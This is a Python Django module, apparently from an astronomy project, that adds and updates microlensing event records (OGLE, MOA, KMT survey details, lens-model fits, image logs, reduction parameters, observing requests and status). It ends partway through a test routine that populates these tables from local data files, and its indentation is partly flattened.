def add_filter(instrument, filter_name):
"""
Adds a new filter name in the database. A single filter can appear multiple
times in this list as it can exist for different instruments.
Keyword arguments:
instrument -- The instrument (object, required) -- ForeignKey object
filter_name -- The filter name (string, required)
"""
try:
add_new = Filter(instrument=instrument, name=filter_name)
add_new.save()
successful = True
except:
successful = False
return successful
################################################################################################################
def check_exists(event_name):
"""
Check if event exists in database.
Keyword arguments:
event_name -- The event name (string, required)
"""
if event_name.startswith("OGLE"):
successful = Event.objects.filter(ev_name_ogle=event_name).exists()
elif event_name.startswith("MOA"):
successful = Event.objects.filter(ev_name_moa=event_name).exists()
elif event_name.startswith("KMT"):
successful = Event.objects.filter(ev_name_kmt=event_name).exists()
else:
successful = False
return successful
################################################################################################################
def check_coords(event_name, check_ra, check_dec):
"""
Cross-survey identification check.
Check if an event at these coordinates already exists in the database.
Keyword arguments:
event_name -- The event name (string, required)
check_ra -- event RA. (string, required)
e.g. "17:54:33.58"
check_dec -- event DEC. (string, required)
e.g. "-30:31:02.02"
"""
################################################################################################################
def add_new_event(event_name, event_ra, event_dec, bright_neighbour = False):
"""
Add a new event to the database.
Keyword arguments:
ev_name_ogle -- OGLE name of event. (string, optional, default='...')
e.g. "OGLE-2015-BLG-1234"
ev_name_moa -- MOA name of event. (string, optional, default='...')
e.g. "MOA-2015-BLG-123"
ev_name_kmt -- KMT name of event. (string, optional, default='...')
e.g. "KMT-2015-BLG-1234"
ev_ra -- event RA. (string, required)
e.g. "17:54:33.58"
ev_dec -- event DEC. (string, required)
e.g. "-30:31:02.02"
bright_neighbour -- Is there a bright neighbour? (boolean, optional,
default=False)
"""
# Check if the event already exists in the database. If not, add it.
if event_name.startswith("OGLE") and check_exists(event_name)==False:
ev = Event(ev_name_ogle=event_name, ev_ra=event_ra, ev_dec=event_dec,
bright_neighbour = bright_neighbour)
ev.save()
successful = True
elif event_name.startswith("MOA") and check_exists(event_name)==False:
ev = Event(ev_name_moa=event_name, ev_ra=event_ra, ev_dec=event_dec,
bright_neighbour = bright_neighbour)
ev.save()
successful = True
elif event_name.startswith("KMT") and check_exists(event_name)==False:
ev = Event(ev_name_kmt=event_name, ev_ra=event_ra, ev_dec=event_dec,
bright_neighbour = bright_neighbour)
ev.save()
successful = True
else:
successful = False
return successful
def update_data(event_name, datafile, last_upd, last_mag, tel, ver, ndat):
"""
Add or Update a data file to the database.
Uses the .dat files rsynced from ARTEMiS.
Keyword arguments:
event_name -- The event name (string, required)
datafile -- Full path to the data file (string, required)
    last_upd -- datetime of last update. (datetime, required)
last_mag -- last recorded magnitude (float, required)
tel -- telescope identifier (string, required)
ver -- reduction version identifier (integer, required)
ndat -- number of data points (integer, required)
"""
# Check if the event already exists in the database.
if event_name.startswith("OGLE") and check_exists(event_name)==True:
# Get event identifier.
ev = Event.objects.get(ev_name_ogle=event_name)
ev.data_file_set.update_or_create(datafile=datafile,
last_updated=last_upd,
last_magnitude=last_mag,
telescope=tel,
version=ver,
ndata=ndat)
ev.save()
successful = True
elif event_name.startswith("MOA") and check_exists(event_name)==True:
# Get event identifier.
ev = Event.objects.get(ev_name_moa=event_name)
ev.data_file_set.update_or_create(datafile=datafile,
last_updated=last_upd,
last_magnitude=last_mag,
telescope=tel,
version=ver,
ndata=ndat)
ev.save()
successful = True
elif event_name.startswith("KMT") and check_exists(event_name)==True:
# Get event identifier.
ev = Event.objects.get(ev_name_kmt=event_name)
ev.data_file_set.update_or_create(datafile=datafile,
last_updated=last_upd,
last_magnitude=last_mag,
telescope=tel,
version=ver,
ndata=ndat)
ev.save()
successful = True
else:
successful = False
return successful
################################################################################################################
def ogle_details(event_name, Tmax, tau, umin,
                 url_link, last_updated=None):
"""
Update or Add OGLE event details to the database. These are the survey event
parameters as displayed on the survey website.
Keyword arguments:
event_name -- OGLE name of event. (string, required)
e.g. "OGLE-2015-BLG-1234"
Tmax -- time of maximum magnification.(float, required)
e.g. 2457135.422
tau -- event timescale (in days). (float, required)
umin -- minimum impact parameter (in units of R_E). (float, required)
    last_updated -- datetime of last update. (datetime, optional,
                 defaults to the current time)
e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
url_link -- URL link to OGLE survey event page (string, required)
"""
    # Evaluate the default timestamp at call time, not once at import time.
    if last_updated is None:
        last_updated = timezone.now()
    # Check if the event already exists in the database.
if check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_ogle=event_name)
ev.ogle_detail_set.update_or_create(Tmax=Tmax, tau=tau, umin=umin,
last_updated=last_updated, url_link=url_link)
ev.save()
successful = True
else:
successful = False
return successful
################################################################################################################
def moa_details(event_name, Tmax, tau, umin,
                url_link, last_updated=None):
"""
Update or Add MOA event details to the database. These are the survey event
parameters as displayed on the survey website.
Keyword arguments:
event_name -- MOA name of event. (string, required)
e.g. "MOA-2015-BLG-123"
Tmax -- time of maximum magnification.(float, required)
e.g. 2457135.422
tau -- event timescale (in days). (float, required)
umin -- minimum impact parameter (in units of R_E). (float, required)
    last_updated -- datetime of last update. (datetime, optional,
                 defaults to the current time)
e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
url_link -- URL link to MOA survey event page (string, required)
"""
    # Evaluate the default timestamp at call time, not once at import time.
    if last_updated is None:
        last_updated = timezone.now()
    # Check if the event already exists in the database.
if check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_moa=event_name)
ev.moa_detail_set.update_or_create(Tmax=Tmax, tau=tau, umin=umin,
last_updated=last_updated, url_link=url_link)
ev.save()
successful = True
else:
successful = False
return successful
################################################################################################################
def kmt_details(event_name, Tmax, tau, umin,
                url_link, last_updated=None):
"""
Update or Add KMT event details to the database. These are the survey event
parameters as displayed on the survey website.
Keyword arguments:
event_name -- KMT name of event. (string, required)
e.g. "KMT-2015-BLG-1234"
Tmax -- time of maximum magnification.(float, required)
e.g. 2457135.422
tau -- event timescale (in days). (float, required)
umin -- minimum impact parameter (in units of R_E). (float, required)
    last_updated -- datetime of last update. (datetime, optional,
                 defaults to the current time)
e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
url_link -- URL link to KMT survey event page (string, required)
"""
    # Evaluate the default timestamp at call time, not once at import time.
    if last_updated is None:
        last_updated = timezone.now()
    # Check if the event already exists in the database.
if check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_kmt=event_name)
ev.kmt_detail_set.update_or_create(Tmax=Tmax, tau=tau, umin=umin,
last_updated=last_updated, url_link=url_link)
ev.save()
successful = True
else:
successful = False
return successful
################################################################################################################
def single_lens_par(event_name, Tmax, e_Tmax, tau, e_tau, umin, e_umin, last_updated):
"""
Update or Add Single Lens model parameters as estimated by ARTEMiS
to the database.
Keyword arguments:
    event_name -- The event name (OGLE, MOA or KMT). (string, required)
                  e.g. "OGLE-2015-BLG-1234"
Tmax -- time of maximum magnification.(float, required)
e.g. 2457135.422
e_Tmax -- error in Tmax (float, required)
tau -- event timescale (in days). (float, required)
e_tau -- error in tau (float, required)
umin -- minimum impact parameter (in units of R_E). (float, required)
e_umin -- error in umin (float, required)
last_updated -- datetime of last update. (datetime, required)
e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
"""
# Check if the event already exists in the database.
if event_name.startswith("OGLE") and check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_ogle=event_name)
ev.single_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau,
e_tau=e_tau, umin=umin, e_umin=e_umin,
last_updated=last_updated)
ev.save()
successful = True
elif event_name.startswith("MOA") and check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_moa=event_name)
ev.single_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau,
e_tau=e_tau, umin=umin, e_umin=e_umin,
last_updated=last_updated)
ev.save()
successful = True
elif event_name.startswith("KMT") and check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_kmt=event_name)
ev.single_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau,
e_tau=e_tau, umin=umin, e_umin=e_umin,
last_updated=last_updated)
ev.save()
successful = True
else:
successful = False
return successful
################################################################################################################
def double_lens_par(event_name, Tmax, e_Tmax, tau, e_tau, umin, e_umin,
q, e_q, s, e_s, rho, alpha, last_updated):
"""
Update or Add Binary Lens model parameters as estimated by ARTEMiS
to the database.
Keyword arguments:
    event_name -- The event name (OGLE, MOA or KMT). (string, required)
                  e.g. "OGLE-2015-BLG-1234"
Tmax -- time of maximum magnification.(float, required)
e.g. 2457135.422
e_Tmax -- error in Tmax (float, required)
tau -- event timescale (in days). (float, required)
e_tau -- error in tau (float, required)
umin -- minimum impact parameter (in units of R_E). (float, required)
e_umin -- error in umin (float, required)
q -- mass ratio between the lensing components. (float, required)
e_q -- error in q (float, required)
s -- projected separation between the two lensing components
(in units of R_E). (float, required)
e_s -- error in s (float, required)
rho -- finite source size (in units of R_E). (float, required)
alpha -- trajectory angle w.r.t. binary axis (float, required)
last_updated -- datetime of last update. (datetime, required)
e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
"""
# Check if the event already exists in the database.
if event_name.startswith("OGLE") and check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_ogle=event_name)
ev.binary_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau,
e_tau=e_tau, umin=umin, e_umin=e_umin, mass_ratio=q,
e_mass_ratio=e_q, separation=s, e_separation=e_s,
rho_finite=rho, angle_a = alpha,
last_updated=last_updated)
ev.save()
successful = True
elif event_name.startswith("MOA") and check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_moa=event_name)
ev.binary_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau,
e_tau=e_tau, umin=umin, e_umin=e_umin, mass_ratio=q,
e_mass_ratio=e_q, separation=s, e_separation=e_s,
rho_finite=rho, angle_a = alpha,
last_updated=last_updated)
ev.save()
successful = True
elif event_name.startswith("KMT") and check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_kmt=event_name)
ev.binary_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau,
e_tau=e_tau, umin=umin, e_umin=e_umin, mass_ratio=q,
e_mass_ratio=e_q, separation=s, e_separation=e_s,
rho_finite=rho, angle_a = alpha,
last_updated=last_updated)
ev.save()
successful = True
else:
successful = False
return successful
################################################################################################################
def update_log(event_name, image_name, timestamp, exptime,
filter1, filter2, filter3, telescope, instrument, group_id,
track_id, req_id, airmass, fwhm, sky_bg, sd_bg, moon_sep,
elongation, nstars, quality):
"""
Update Log with new image details in the database.
Keyword arguments:
event_name -- The event name. (string, required)
e.g. "OGLE-2015-BLG-1234"
image_name -- The image name. (string, required)
e.g. lsc1m005-kb78-20150922-0089-e10.fits
timestamp -- Time of observation. (datetime, required)
e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
exptime -- Exposure time. (float, required)
filter1 -- Filter1 wheel identifier. (string, required)
filter2 -- Filter2 wheel identifier. (string, required)
filter3 -- Filter3 wheel identifier. (string, required)
telescope -- Telescope identifier. (string, required)
e.g. "1m0-05"
instrument -- Instrument identifier.(string, required)
e.g. "kb78"
group_id -- Group identifier. (string, required)
e.g. "RBN20150922T15.42112818"
track_id -- Track identifier. (string, required)
e.g. "0000110965"
req_id -- Request identifier. (string, required)
e.g. "0000427795"
airmass -- Airmass. (float, required)
fwhm -- average fwhm of stars. (in pixels) (float, required)
sky_bg -- sky background value. (in ADU) (float, required)
sd_bg -- error in sky_bg (float, required)
moon_sep -- angular distance of centre of moon from target. (float, required)
elongation -- estimated elongation of stars. (float, required)
nstars -- number of stars found in image. (integer, required)
quality -- image quality assessment. (string, required)
"""
if event_name.startswith("OGLE") and check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_ogle=event_name)
ev.robonet_log_set.update_or_create(event=event_name, image_name=image_name,
timestamp=timestamp, exptime=exptime, filter1=filter1,
filter2=filter2, filter3=filter3, telescope=telescope,
instrument=instrument, group_id=group_id, track_id=track_id,
req_id=req_id, airmass=airmass, fwhm=fwhm, sky_bg=sky_bg,
sd_bg=sd_bg, moon_sep=moon_sep, elongation=elongation,
nstars=nstars, quality=quality)
ev.save()
successful = True
elif event_name.startswith("MOA") and check_exists(event_name)==True:
ev = Event.objects.get(ev_name_moa=event_name)
ev.robonet_log_set.update_or_create(event=event_name, image_name=image_name,
timestamp=timestamp, exptime=exptime, filter1=filter1,
filter2=filter2, filter3=filter3, telescope=telescope,
instrument=instrument, group_id=group_id, track_id=track_id,
req_id=req_id, airmass=airmass, fwhm=fwhm, sky_bg=sky_bg,
sd_bg=sd_bg, moon_sep=moon_sep, elongation=elongation,
nstars=nstars, quality=quality)
ev.save()
successful = True
elif event_name.startswith("KMT") and check_exists(event_name)==True:
ev = Event.objects.get(ev_name_kmt=event_name)
ev.robonet_log_set.update_or_create(event=event_name, image_name=image_name,
timestamp=timestamp, exptime=exptime, filter1=filter1,
filter2=filter2, filter3=filter3, telescope=telescope,
instrument=instrument, group_id=group_id, track_id=track_id,
req_id=req_id, airmass=airmass, fwhm=fwhm, sky_bg=sky_bg,
sd_bg=sd_bg, moon_sep=moon_sep, elongation=elongation,
nstars=nstars, quality=quality)
ev.save()
successful = True
else:
successful = False
return successful
################################################################################################################
def update_reduction(event_name, lc_file, timestamp, version, ref_image, ron=0.0, gain=1.0,
oscanx1=1, oscanx2=50, oscany1=1, oscany2=500, imagex1=51, imagex2=1000,
imagey1=1, imagey2=1000, minval=1.0, maxval=55000.0, growsatx=0,
growsaty=0, coeff2=1.0e-06, coeff3=1.0e-12,
sigclip=4.5, sigfrac=0.5, flim=2.0, niter=4, use_reflist=0, max_nimages=1,
max_sky=5000.0, min_ell=0.8, trans_type='polynomial', trans_auto=0, replace_cr=0,
min_scale=0.99, max_scale=1.01,
fov=0.1, star_space=30, init_mthresh=1.0, smooth_pro=2, smooth_fwhm=3.0,
var_deg=1, det_thresh=2.0, psf_thresh=8.0, psf_size=8.0, psf_comp_dist=0.7,
psf_comp_flux=0.1, psf_corr_thresh=0.9, ker_rad=2.0, lres_ker_rad=2.0,
subframes_x=1, subframes_y=1, grow=0.0, ps_var=0, back_var=1, diffpro=0):
"""
Add or Update the lightcurve location and pipeline event reduction parameters
in the database. Also stores the reference frame name and DanDIA parameters
used to generate the lightcurve.
Keyword arguments:
event_name -- The event name. (string, required)
e.g. "OGLE-2015-BLG-1234"
lc_file -- The lightcurve file. (string, required)
timestamp -- The date the lightcurve file was created. (datetime, required)
e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
version -- Reduction identifier (integer, required)
ref_image -- Reference image used. (string, required)
-+-+- DanDIA parameters -+-+-
ron -- CCD readout noise (in ADU) (float, optional, default=0.0)
gain -- CCD gain. (e-/ADU) (float, optional, default=1.0)
oscanx1 -- Overscan strip coordinate x1 (integer, optional, default=1)
oscanx2 -- Overscan strip coordinate x2 (integer, optional, default=50)
oscany1 -- Overscan strip coordinate y1 (integer, optional, default=1)
oscany2 -- Overscan strip coordinate y2 (integer, optional, default=500)
imagex1 -- Image region coordinate x1 (integer, optional, default=51)
imagex2 -- Image region coordinate x2 (integer, optional, default=1000)
imagey1 -- Image region coordinate y1 (integer, optional, default=1)
imagey2 -- Image region coordinate y2 (integer, optional, default=1000)
minval -- Minimum useful pixel value in a raw image (ADU).
(float, optional, default=1.0)
maxval -- maximum useful pixel value in a raw image (ADU).
(float, optional, default=55000.0)
growsatx -- Half box size in the x direction (pix) to be used for growing
saturated bad pixels in the bad pixel mask for each science image.
This parameter should be non-negative.
(integer, optional, default=0)
growsaty -- Half box size in the y direction (pix) to be used for growing
saturated bad pixels in the bad pixel mask for each science image.
This parameter should be non-negative.
(integer, optional, default=0)
coeff2 -- Coefficient a1 in the linearisation equation:
Xnew = X + a1*X^2 + a2*X^3
where X represents the image counts after bias level and bias pattern
correction.
(float, optional, default=1.0e-06)
coeff3 -- Coefficient a1 in the linearisation equation:
Xnew = X + a1*X^2 + a2*X^3
where X represents the image counts after bias level and bias pattern
correction.
(float, optional, default=1.0e-12)
sigclip -- Threshold in units of sigma for cosmic ray detection on the Laplacian
image. This parameter should be positive.
(float, optional, default=4.5)
sigfrac -- Fraction of "sigclip" to be used as a threshold for cosmic ray growth.
This parameter should be positive.
(float, optional, default=0.5)
    flim -- Minimum contrast between the Laplacian image and the fine structure image.
This parameter should be positive.
(float, optional, default=2.0)
niter -- Maximum number of iterations to perform.
This parameter should be positive.
(integer, optional, default=4)
use_reflist -- Use images in reflist.<filt>.txt?
(integer, optional, default=0 (No))
max_nimages -- Maximum number of images to combine for reference.
(integer, optional, default=1)
max_sky -- Maximum acceptable value for sky background.
(float, optional, default=5000.0)
min_ell -- Minimum PSF ellipticity for image to be used in reference.
(float, optional, default=0.8)
trans_type -- Type of coordinate transformation to fit when fitting a coordinate
transformation between two images.
Options:["shift"=General pixel shift, "rot_shift"=Rotation and
general pixel shift, "rot_mag_shift"=Rotation magnification
and general pixel shift, "linear"=Linear, "polynomial"=Polynomial]
(string, optional, default='polynomial')
trans_auto -- Use automatic determination of the coordinate transformation type
when fitting a coordinate transformation between two images?
(integer, optional, default=0 (No))
replace_cr -- Replace cosmic ray pixels? (integer, optional, default=0 (No))
min_scale -- Minimum possible transformation scale factor (magnification) between
any two images.
(float, optional, default=0.99)
max_scale -- Maximum possible transformation scale factor (magnification) between
any two images.
(float, optional, default=1.01)
fov -- Field of view of the CCD camera (deg).
(float, optional, default=0.1)
star_space -- Average spacing (pix) between stars.
(integer, optional, default=30)
init_mthresh -- Initial distance threshold (pix) to reject false star matches.
(float, optional, default=1.0)
smooth_pro -- Smooth image? (integer, optional, default=2)
smooth_fwhm -- Amount of smoothing to perform (float, optional, default=3.0)
var_deg -- Polynomial degree of the spatial variation of the model used to
represent the image PSF.
(0=Constant, 1=Linear, 2=Quadratic, 3=Cubic)
(integer, optional, default=1)
det_thresh -- Detection threshold used to detect stars in units of image sky
sigma.
(float, optional, default=2.0)
psf_thresh -- Detection threshold used to detect candidate PSF stars in units
of image sky sigma.
(float, optional, default=8.0)
psf_size -- Size of the model PSF stamp in units of FWHM.
(float, optional, default=8.0)
psf_comp_dist -- Any star within a distance "0.5*psf_comp_dist*psf_size",
in units of FWHM, of another star is considered to be a companion
of that star for PSF star selection.
(float, optional, default=0.7)
psf_comp_flux -- Maximum flux ratio that any companion star may have for a star to
be considered a PSF star.
(float, optional, default=0.1)
    psf_corr_thresh -- Minimum correlation coefficient of a star with the image PSF
model in order to be considered a PSF star.
(float, optional, default=0.9)
ker_rad -- Radius of the kernel pixel array in units of image FWHM.
(float, optional, default=2.0)
lres_ker_rad -- Threshold radius of the kernel pixel array, in units of image FWHM,
beyond which kernel pixels are of lower resolution.
(float, optional, default=2.0)
subframes_x -- Number of subdivisions in the x direction used in defining the grid
of kernel solutions.
(integer, optional, default=1)
subframes_y -- Number of subdivisions in the y direction used in defining the grid
of kernel solutions.
(integer, optional, default=1)
grow -- Amount of overlap between the image regions used for the kernel solutions.
(float, optional, default = 0.0)
ps_var -- Use spatially variable photometric scale factor?
(integer, optional, default=0 (No))
back_var -- Use spatially variable differential background.
(integer, optional, default=1 (Yes))
diffpro -- Switch for the method of difference image creation.
(integer, optional, default=0 (No))
"""
if event_name.startswith("OGLE") and check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_ogle=event_name)
ev.robonet_reduction_set.update_or_create(event=event_name, lc_file=lc_file,
timestamp=timestamp, version=version, ref_image=ref_image,
ron=ron, gain=gain, oscanx1=oscanx1,oscanx2=oscanx2,
oscany1=oscany1, oscany2=oscany2, imagex1=imagex1,
imagex2=imagex2, imagey1=imagey1, imagey2=imagey2,
minval=minval, maxval=maxval, growsatx=growsatx,
growsaty=growsaty, coeff2=coeff2, coeff3=coeff3,
sigclip=sigclip, sigfrac=sigfrac, flim=flim, niter=niter,
use_reflist=use_reflist, max_nimages=max_nimages, max_sky=max_sky,
min_ell=min_ell, trans_type=trans_type, trans_auto=trans_auto,
replace_cr=replace_cr, min_scale=min_scale, max_scale=max_scale,
fov=fov, star_space=star_space, init_mthresh=init_mthresh,
smooth_pro=smooth_pro, smooth_fwhm=smooth_fwhm, var_deg=var_deg,
det_thresh=det_thresh, psf_thresh=psf_thresh, psf_size=psf_size,
psf_comp_dist=psf_comp_dist, psf_comp_flux=psf_comp_flux,
psf_corr_thresh=psf_corr_thresh, ker_rad=ker_rad,
lres_ker_rad=lres_ker_rad, subframes_x=subframes_x,
subframes_y=subframes_y, grow=grow, ps_var=ps_var, back_var=back_var,
diffpro=diffpro)
ev.save()
successful = True
elif event_name.startswith("MOA") and check_exists(event_name)==True:
ev = Event.objects.get(ev_name_moa=event_name)
ev.robonet_reduction_set.update_or_create(event=event_name, lc_file=lc_file,
timestamp=timestamp, version=version, ref_image=ref_image,
ron=ron, gain=gain, oscanx1=oscanx1,oscanx2=oscanx2,
oscany1=oscany1, oscany2=oscany2, imagex1=imagex1,
imagex2=imagex2, imagey1=imagey1, imagey2=imagey2,
minval=minval, maxval=maxval, growsatx=growsatx,
growsaty=growsaty, coeff2=coeff2, coeff3=coeff3,
sigclip=sigclip, sigfrac=sigfrac, flim=flim, niter=niter,
use_reflist=use_reflist, max_nimages=max_nimages, max_sky=max_sky,
min_ell=min_ell, trans_type=trans_type, trans_auto=trans_auto,
replace_cr=replace_cr, min_scale=min_scale, max_scale=max_scale,
fov=fov, star_space=star_space, init_mthresh=init_mthresh,
smooth_pro=smooth_pro, smooth_fwhm=smooth_fwhm, var_deg=var_deg,
det_thresh=det_thresh, psf_thresh=psf_thresh, psf_size=psf_size,
psf_comp_dist=psf_comp_dist, psf_comp_flux=psf_comp_flux,
psf_corr_thresh=psf_corr_thresh, ker_rad=ker_rad,
lres_ker_rad=lres_ker_rad, subframes_x=subframes_x,
subframes_y=subframes_y, grow=grow, ps_var=ps_var, back_var=back_var,
diffpro=diffpro)
ev.save()
successful = True
elif event_name.startswith("KMT") and check_exists(event_name)==True:
ev = Event.objects.get(ev_name_kmt=event_name)
ev.robonet_reduction_set.update_or_create(event=event_name, lc_file=lc_file,
timestamp=timestamp, version=version, ref_image=ref_image,
ron=ron, gain=gain, oscanx1=oscanx1,oscanx2=oscanx2,
oscany1=oscany1, oscany2=oscany2, imagex1=imagex1,
imagex2=imagex2, imagey1=imagey1, imagey2=imagey2,
minval=minval, maxval=maxval, growsatx=growsatx,
growsaty=growsaty, coeff2=coeff2, coeff3=coeff3,
sigclip=sigclip, sigfrac=sigfrac, flim=flim, niter=niter,
use_reflist=use_reflist, max_nimages=max_nimages, max_sky=max_sky,
min_ell=min_ell, trans_type=trans_type, trans_auto=trans_auto,
replace_cr=replace_cr, min_scale=min_scale, max_scale=max_scale,
fov=fov, star_space=star_space, init_mthresh=init_mthresh,
smooth_pro=smooth_pro, smooth_fwhm=smooth_fwhm, var_deg=var_deg,
det_thresh=det_thresh, psf_thresh=psf_thresh, psf_size=psf_size,
psf_comp_dist=psf_comp_dist, psf_comp_flux=psf_comp_flux,
psf_corr_thresh=psf_corr_thresh, ker_rad=ker_rad,
lres_ker_rad=lres_ker_rad, subframes_x=subframes_x,
subframes_y=subframes_y, grow=grow, ps_var=ps_var, back_var=back_var,
diffpro=diffpro)
ev.save()
successful = True
else:
successful = False
return successful
################################################################################################################
def update_request(event_name, t_sample, exptime, timestamp=None, onem_on=False,
twom_on=False, request_type='M', which_filter='ip'):
"""
Update or Add robonet observing request to the database.
Keyword arguments:
event_name -- The event name. (string, required)
e.g. "OGLE-2015-BLG-1234"
t_sample -- Sampling interval to use. (in minutes) (float, required)
exptime -- Exposure time to use. (in seconds) (integer, required)
timestamp -- The request submission time.
(datetime, optional, default=timezone.now())
e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
onem_on -- Observe on 1m network? (boolean, optional, default=False)
twom_on -- Observe on 2m network? (boolean, optional, default=False)
request_type -- Observation request class (string, optional, default='M')
('T':'ToO','M':'Monitor', 'S':'Single')
which_filter -- Filter identifier string. (string, optional, default='ip')
"""
if event_name.startswith("OGLE") and check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_ogle=event_name)
ev.robonet_request_set.update_or_create(event=event_name, timestamp=timestamp,
onem_on=onem_on, twom_on=twom_on, t_sample=t_sample, exptime=exptime,
request_type=request_type, which_filter=which_filter)
ev.save()
successful = True
elif event_name.startswith("MOA") and check_exists(event_name)==True:
ev = Event.objects.get(ev_name_moa=event_name)
ev.robonet_request_set.update_or_create(event=event_name, timestamp=timestamp,
onem_on=onem_on, twom_on=twom_on, t_sample=t_sample, exptime=exptime,
request_type=request_type, which_filter=which_filter)
ev.save()
successful = True
elif event_name.startswith("KMT") and check_exists(event_name)==True:
ev = Event.objects.get(ev_name_kmt=event_name)
ev.robonet_request_set.update_or_create(event=event_name, timestamp=timestamp,
onem_on=onem_on, twom_on=twom_on, t_sample=t_sample, exptime=exptime,
request_type=request_type, which_filter=which_filter)
ev.save()
successful = True
else:
successful = False
return successful
################################################################################################################
def update_status(event_name, timestamp=None, priority='L', status='AC',
comment='--', updated_by='--', omega=0.0):
"""
Update or Add robonet status to the database.
Keyword arguments:
event_name -- The event name. (string, required)
e.g. "OGLE-2015-BLG-1234"
timestamp -- The request submission time.
(datetime, optional, default=timezone.now())
e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
priority -- Priority flag for human observers.
(A:anomaly, H:high, M:medium, L:low)
(string, optional, default='L')
status -- Event status.
(CH:check, AC:active, AN:anomaly, RE:rejected, EX:expired)
(string, optional, default='AC')
comment -- Comment field. (string, optional, default='--')
updated_by -- Updated by which user? (string, optional, default='--')
omega -- Priority value calculated based on parameters. (float, optional, default=0.0)
"""
if event_name.startswith("OGLE") and check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_ogle=event_name)
ev.robonet_status_set.update_or_create(event=event_name, timestamp=timestamp,
priority=priority, status=status, comment=comment,
updated_by=updated_by, omega=omega)
ev.save()
successful = True
elif event_name.startswith("MOA") and check_exists(event_name)==True:
ev = Event.objects.get(ev_name_moa=event_name)
ev.robonet_status_set.update_or_create(event=event_name, timestamp=timestamp,
priority=priority, status=status, comment=comment,
updated_by=updated_by, omega=omega)
ev.save()
successful = True
elif event_name.startswith("KMT") and check_exists(event_name)==True:
ev = Event.objects.get(ev_name_kmt=event_name)
ev.robonet_status_set.update_or_create(event=event_name, timestamp=timestamp,
priority=priority, status=status, comment=comment,
updated_by=updated_by, omega=omega)
ev.save()
successful = True
else:
successful = False
return successful
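# Illustrative call (a sketch added for clarity; it assumes the event already
# exists in the database and is not part of the original module):
#     update_status("OGLE-2015-BLG-1234", priority='H', status='AN',
#                   comment='possible anomaly', updated_by='artemis', omega=15.2)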
################################################################################################################
##TEST
def run_test():
# Populate Event database
from glob import glob
ogle_event_list = glob('/work/Tux8/ytsapras/Data/RoboNet/ARTEMiS/PublishedParameters/2015/OGLE/*.model')
count = 0
for i in ogle_event_list:
data = open(i).read().split()
ev_ra = data[0]
ev_dec = data[1]
event_name = data[2].replace('OB15','OGLE-2015-BLG-')
add_new_event(event_name, ev_ra, ev_dec)
count = count + 1
print count
# Populate Ogle_Detail database
from glob import glob
ogle_event_list = glob('/work/Tux8/ytsapras/Data/RoboNet/ARTEMiS/PublishedParameters/2015/OGLE/*.model')
count = 0
for i in ogle_event_list:
data = open(i).read().split()
event_name = data[2].replace('OB15','OGLE-2015-BLG-')
Tmax = 2450000.0+float(data[3])
tau = float(data[5])
umin = float(data[7])
year, og_id = '20'+data[2][2:4], data[2].replace('OB15','blg-')
url_link = 'http://ogle.astrouw.edu.pl/ogle4/ews/%s/%s.html' % (year, og_id)
last_updated=timezone.now()
ogle_details(event_name=event_name, Tmax=Tmax, tau=tau, umin=umin,
url_link=url_link, last_updated=last_updated)
count = count + 1
print count
# Populate Data_File database
from astropy.time import Time
ogle_dat_list = glob('/work/Tux8/ytsapras/Data/RoboNet/ARTEMiS/data/*OB15*I.dat')
count = 0
for i in ogle_dat_list:
data = open(i).readlines()
data = data[1:]
if (data != []):
event_name = i.split('/')[-1][1:-5].replace('OB15','OGLE-2015-BLG-')
datafile = i
last_upd = Time(float('245'+data[-1].split()[2]), format='jd').datetime
last_upd = timezone.make_aware(last_upd, timezone.get_current_timezone())
last_mag = float(data[-1].split()[0])
ndat = len(data)-1
tel = i.split('/')[-1][0:1]
ver = 1
update_data(event_name, datafile, last_upd, last_mag, tel, ver, ndat)
count = count + 1
print count
# Populate Robonet_Status database
count = 0
ogle_events_list = Event.objects.filter(ev_name_ogle__contains="OGLE")
for event_id in ogle_events_list:
event_name = event_id.ev_name_ogle
update_status(event_name, timestamp=timezone.now(), priority='L', status='AC',
comment='--', updated_by='--')
count = count + 1
print count
# Populate Robonet_Request database
import random
count = 0
ogle_events_list = Event.objects.filter(ev_name_ogle__contains="OGLE")
for event_id in ogle_events_list:
event_name = event_id.ev_name_ogle
t_sample = random.uniform(0.1,24.0)
exptime = random.randint(10,300)
update_request(event_name, t_sample, exptime, timestamp=timezone.now(), onem_on=False,
twom_on=False, request_type='M', which_filter='ip')
count = count + 1
print count
# Populate Robonet_Log database
import random
count = 0
ogle_events_list = Event.objects.filter(ev_name_ogle__contains="OGLE")
for event_id in ogle_events_list:
event_name = event_id.ev_name_ogle
image_name = "image_name.fits"
timestamp = timezone.now()
exptime = random.randint(10,300)
filter1 = 'air'
filter2 = 'ip'
filter3 = 'air'
